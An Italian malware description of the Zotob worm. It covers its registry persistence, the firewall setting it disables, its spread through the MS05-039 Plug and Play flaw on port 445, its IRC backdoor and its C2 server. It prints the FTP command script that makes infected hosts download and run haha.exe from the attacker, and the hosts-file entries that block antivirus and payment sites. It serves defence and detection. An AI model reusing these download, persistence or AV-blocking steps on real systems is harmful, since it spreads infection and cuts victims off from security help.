Alias: W32/Zotob.A, W32/Zotob.worm, Zotob.A, Zotob-A, Mytob.IQ
Tipo: Worm
Sistemi vulnerabili: Windows 2000
Si tratta di un worm lungo 22528 byte compresso con il programma UPack. Quando viene eseguito, il worm copia se stesso nella cartella di sistema di Windows usando il nome “botzor.exe”.
Allo scopo di evitare che nella memoria di sistema siano attive piu istanze di se stesso, il worm crea un mutex con il nome “B-O-T-Z-O-R”.
Per assicurarsi di venire eseguito ad ogni avvio di Windows, il worm aggiunge le seguenti chiavi di Registro
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
“WINDOWS SYSTEM” = “botzor.exe”
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
“WINDOWS SYSTEM” = “botzor.exe”
Nota: il worm monitora costantemente le chiavi di Registro menzionate, creandole nuovamente nel caso in cui non siano piu presenti.
Il worm modifica anche la seguente chiave:
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess
“Start” = “4”
Tale impostazione ha l’effetto di diminuire il livello di sicurezza del sistema infettato e disabilita l’accesso condiviso sui sistemi Windows NT e superiori
Il worm genera indirizzi IP in modo casuale e tenta di connettersi sulla porta TCP 445 degli indirizzi generati allo scopo di sfruttare la vulnerabilita relativa al Plug and Play buffer overflow, descritta nella bollettino di sicurezza Microsoft MS05-039
http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
Se tale vulnerabilita viene sfruttata con successo, il worm esegue del codice (shellcode) sulla macchina remota, che istruisce il sistema colpito a connettersi al computer che ha determinato l’attacco per creare una copia del worm. Questa copia viene trasferita sulla macchina attaccata attraverso protocollo FTP, usando i comandi presenti nel file 2pac.txt. A tale scopo, il worm crea un apposito task con il nome “SCAN”.
Il file 2pac.txt contiene i seguenti comandi FTP:
open %IP% %porta TCP%
user hell rulez
binary
get haha.exe
quit
Sul sistema remoto compromesso, il worm esegue localmente il programma FTP.EXE per trasferire un file con il nome haha.exe creato sul computer infetto che ha portato l’attacco, quindi lo esegue. Il worm, che funziona come una sorta di server FTP, usa la porta 33333
Per impedire l’accesso a determinati siti web, il worm modifica il file hosts, inserendo i seguenti dati
127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 pandasoftware.com
127.0.0.1 www.pandasoftware.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.grisoft.com
127.0.0.1 www.microsoft.com
127.0.0.1 microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 www.amazon.com
127.0.0.1 www.amazon.co.uk
127.0.0.1 www.amazon.ca
127.0.0.1 www.amazon.fr
127.0.0.1 www.paypal.com
127.0.0.1 paypal.com
127.0.0.1 moneybookers.com
127.0.0.1 www.moneybookers.com
127.0.0.1 www.ebay.com
127.0.0.1 ebay.com
Il worm presenta anche funzioni di backdoor pilotata attraverso IRC e permette di svolgere i seguenti compiti
Trasferimento di file
Trasferimento di aggiornamenti del worm
Esecuzione di file
Invio di informazioni sistema
Notifica a canali/operatori IRC attraverso messaggi privati
Riavvio del computer
Accesso FTP ai sistemi compromessi
Rimozione di componenti del worm
Il worm contiene il seguente testo:
.... Made By .... Greetz to good friend ..... Based On ....
MSG to avs: the first av who detect this worm will be the first killed in the next 24hours!!!
Il worm tenta di connettersi al server IRC diabl0.turkcoders.net.